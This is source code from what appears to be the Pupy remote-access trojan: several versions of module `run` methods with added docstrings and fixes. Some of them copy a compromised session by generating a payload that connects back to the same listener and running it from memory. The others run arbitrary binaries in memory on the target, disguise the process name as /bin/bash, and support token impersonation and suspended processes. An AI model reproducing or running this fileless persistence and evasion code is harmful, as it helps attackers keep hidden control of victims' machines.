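def run(self, args):
    """Duplicate the running session: rebuild a payload from the client's
    current config and launch it from memory on the target.

    The payload is generated from ``self.client.get_conf()``, so the new
    instance inherits the connect-back settings of the running client and
    should call home to the same listener.

    Args:
        args: parsed module arguments. ``args.impersonate`` and
            ``args.process`` are forwarded to ``exec_pe`` (Windows only).

    Returns:
        None. Progress is reported through ``self.success``; an unsupported
        target platform is reported through ``self.warning`` and nothing is
        executed.
    """
    on_windows = self.client.is_windows()
    if not on_windows and not self.client.is_linux():
        # Neither in-memory loader applies: bail out before generating a
        # payload and before the unconditional "executed" message below,
        # which would otherwise be printed without anything having run.
        self.warning(
            "Unsupported platform for in-memory execution: {}".format(
                self.client.desc['platform']))
        return

    self.success("looking for configured connect back address ...")

    payload, tpl, _ = pupygen.generate_binary_from_template(
        self.client.get_conf(),
        self.client.desc['platform'],
        arch=self.client.arch,
    )
    self.success(
        "Generating the payload with the current config from {} - size={}".format(
            tpl, len(payload)))

    self.success("Executing the payload from memory ...")
    if on_windows:
        # fork=True / timeout=None: detach from the current process and do not
        # wait for the new instance, so this session stays responsive.
        exec_pe(
            self, "",
            raw_pe=payload,
            interactive=False,
            fork=True,
            timeout=None,
            use_impersonation=args.impersonate,
            suspended_process=args.process,
        )
    else:
        # Linux: run the raw ELF image from memory; argv0 is spoofed as
        # /bin/bash and the parent is left alive (terminate=False).
        mexec(
            self, payload, [],
            argv0='/bin/bash',
            stdout=False,
            raw=True,
            terminate=False,
        )

    self.success("pupy payload executed from memory")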
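def run(self, args):
    """Duplicate the running session with a freshly generated payload run
    from memory on the target, with special handling for bind launchers.

    For a Windows client whose launcher is ``bind`` the new instance cannot
    reuse the running listener's port, so the operator is prompted for a
    different one and the ``--port`` launcher argument is rewritten.  In
    every other case the payload simply reuses the client's current config
    (connect-back launchers call home to the same listener).

    Args:
        args: parsed module arguments. ``args.impersonate`` and
            ``args.process`` are forwarded to ``exec_pe`` (Windows only).

    Returns:
        None. Progress and operator hints are reported through
        ``self.info`` / ``self.success``; a missing ``--port`` pair or an
        unsupported platform is reported through ``self.warning`` and
        nothing is executed.
    """
    on_windows = self.client.is_windows()
    if not on_windows and not self.client.is_linux():
        self.warning(
            "Unsupported platform for in-memory execution: {}".format(
                self.client.desc['platform']))
        return

    launcher_type = self.client.desc['launcher']
    address_port = self.client.desc['address']
    new_conf = self.client.get_conf()
    bind_mode = on_windows and launcher_type == "bind"
    listening_address_port = None

    if bind_mode:
        self.info('The current pupy launcher is using a BIND connection on the Windows target.')
        self.info('It is listening on {0} on the target'.format(address_port))
        self.info('For the duplication, you have to choose another port and it will '
                  'listen on this new specific port on the target')
        self.info("Be careful, you have to choose a port which is not used on the target!")
        self.info("Be careful to firewall configuration/rules on the target too...")

        # Work on a copy: get_conf() may hand back the client's live list and
        # we do not want to rewrite the running launcher's arguments.
        launcher_args = list(new_conf.get('launcher_args') or [])
        try:
            port_idx = launcher_args.index("--port") + 1
        except ValueError:
            port_idx = len(launcher_args)
        if port_idx >= len(launcher_args):
            # Previously this raised an uncaught ValueError/IndexError.
            self.warning("Cannot duplicate: no '--port <n>' pair found in the launcher arguments")
            return
        current_port = str(launcher_args[port_idx]).strip()

        listening_port = None
        while listening_port is None:
            raw = input("[?] Give me the listening port to use on the target: ")
            try:
                candidate = int(raw)
            except ValueError as e:
                self.warning("You have to give me a valid port. Try again. ({})".format(e))
                continue
            # int() alone accepted 0, negatives and values above 65535.
            if not 1 <= candidate <= 65535:
                self.warning("Port must be in the range 1-65535. Try again.")
                continue
            if str(candidate) == current_port:
                self.warning("Port {} is already used by the running launcher. Try again.".format(candidate))
                continue
            listening_port = candidate

        # desc['address'] is assumed to be 'host:port'; rsplit keeps a
        # bracketed IPv6 host intact where split(':')[0] would not.
        listening_address = address_port.rsplit(':', 1)[0]
        listening_address_port = "{0}:{1}".format(listening_address, listening_port)
        self.info("The new pupy instance will listen on {0} on the target".format(listening_address_port))

        # Without this the new payload would listen on the same port as the
        # initial launcher on the target.
        launcher_args[port_idx] = str(listening_port)

        # --oneliner-host is not compatible with an exe payload: drop the flag
        # and its value rather than blanking them, which left empty argv
        # entries (and could index past the end of the list).
        cleaned = []
        skip_next = False
        for val in launcher_args:
            if skip_next:
                skip_next = False
                continue
            if "--oneliner-host" in val:
                # '--oneliner-host=value' carries its value inline; the
                # two-token form has it in the next entry.
                skip_next = '=' not in val
                continue
            cleaned.append(val)
        new_conf['launcher_args'] = cleaned

    self.success("Generating the payload...")
    payload, tpl, _ = pupygen.generate_binary_from_template(
        self.log,
        new_conf,
        self.client.desc['platform'],
        arch=self.client.arch,
    )
    self.success("Payload generated with the current config from {} - size={}".format(tpl, len(payload)))

    self.success("Executing the payload from memory ...")
    if on_windows:
        exec_pe(
            self, "",
            raw_pe=payload,
            interactive=False,
            use_impersonation=args.impersonate,
            suspended_process=args.process,
            wait=False,
        )
    else:
        mexec(self, payload, [], argv0='/bin/bash', raw=True)
    self.success("pupy payload executed from memory")

    if bind_mode:
        self.success(
            'You have to connect to the target manually on {0}: '
            'try "connect --host {0}" in pupy shell'.format(listening_address_port))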
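def run(self, args):
    """Spawn a second pupy instance on the target from memory.

    A payload is generated from the client's current config (so it calls
    back to the same listener as the running session) and executed with the
    platform's in-memory loader.

    Args:
        args: parsed module arguments. ``args.impersonate`` and
            ``args.process`` are forwarded to ``exec_pe`` (Windows only).

    Returns:
        None. Unsupported platforms are reported through ``self.warning``
        and no payload is generated or executed.
    """
    if self.client.is_windows():
        loader = 'pe'
    elif self.client.is_linux():
        loader = 'elf'
    else:
        # Previously the method fell through and still printed
        # "pupy payload executed from memory" without running anything.
        self.warning(
            "Unsupported platform for in-memory execution: {}".format(
                self.client.desc['platform']))
        return

    self.success("looking for configured connect back address ...")

    payload, tpl, _ = pupygen.generate_binary_from_template(
        self.client.get_conf(),
        self.client.desc['platform'],
        arch=self.client.arch,
    )
    self.success("Generating the payload with the current config from {} - size={}".format(tpl, len(payload)))

    self.success("Executing the payload from memory ...")
    if loader == 'pe':
        # Detached (fork=True) and unbounded (timeout=None): the new instance
        # outlives this call and this session does not block on it.
        exec_pe(
            self, "",
            raw_pe=payload,
            interactive=False,
            fork=True,
            timeout=None,
            use_impersonation=args.impersonate,
            suspended_process=args.process,
        )
    else:
        # Raw ELF from memory with a spoofed argv0; the parent is kept alive.
        mexec(self, payload, [], argv0='/bin/bash', stdout=False, raw=True, terminate=False)

    self.success("pupy payload executed from memory")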
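def run(self, args):
    """Execute a binary from memory on the target with the platform loader.

    Args:
        args: parsed module arguments. ``args.path`` and ``args.args`` name
            the binary and its arguments; ``args.interactive`` is forwarded
            to both loaders. ``args.impersonate`` and
            ``args.suspended_process`` apply to Windows (``exec_pe``) only;
            ``args.argv0`` applies to Linux (``mexec``) only and defaults to
            the basename of ``args.path``.

    Returns:
        None. The loaders' return value is not used by this module; an
        unsupported platform is reported through ``self.warning``.
    """
    if self.client.is_windows():
        exec_pe(
            self, args.args,
            path=args.path,
            interactive=args.interactive,
            use_impersonation=args.impersonate,
            suspended_process=args.suspended_process,
        )
    elif self.client.is_linux():
        # `path` is presumably os.path (imported elsewhere in this file).
        mexec(
            self, args.path, args.args,
            argv0=args.argv0 or path.basename(args.path),
            interactive=args.interactive,
        )
    else:
        # Previously this silently did nothing on other platforms.
        self.warning(
            "Unsupported platform for in-memory execution: {}".format(
                self.client.desc['platform']))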
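def run(self, args):
    """Execute a binary from memory on the target and optionally save its
    captured output to a local file.

    Args:
        args: parsed module arguments. ``args.path`` / ``args.args`` name the
            binary and its arguments; ``args.interactive`` is forwarded to
            both loaders. ``args.fork``, ``args.timeout``,
            ``args.impersonate`` and ``args.suspended_process`` apply to
            Windows (``exec_pe``) only; ``args.argv0`` applies to Linux
            (``mexec``) only and defaults to the basename of ``args.path``.
            ``args.log``, when set, is a path on the operator side (this
            process, not the target) where the loader's output is written.

    Returns:
        None. An unsupported platform is reported through ``self.warning``
        and nothing is executed or written.
    """
    if self.client.is_windows():
        log = exec_pe(
            self, args.args,
            path=args.path,
            interactive=args.interactive,
            fork=args.fork,
            timeout=args.timeout,
            use_impersonation=args.impersonate,
            suspended_process=args.suspended_process,
        )
    elif self.client.is_linux():
        # `path` is presumably os.path (imported elsewhere in this file).
        log = mexec(
            self, args.path, args.args,
            argv0=args.argv0 or path.basename(args.path),
            interactive=args.interactive,
        )
    else:
        # Previously `log` was left unbound here and the check below raised
        # UnboundLocalError on any other platform.
        self.warning(
            "Unsupported platform for in-memory execution: {}".format(
                self.client.desc['platform']))
        return

    if log and args.log:
        # The loaders' return type is not visible here; the file is opened in
        # binary mode, so encode text output rather than fail on write.
        data = log if isinstance(log, bytes) else log.encode('utf-8', 'replace')
        with open(args.log, 'wb') as output:
            output.write(data)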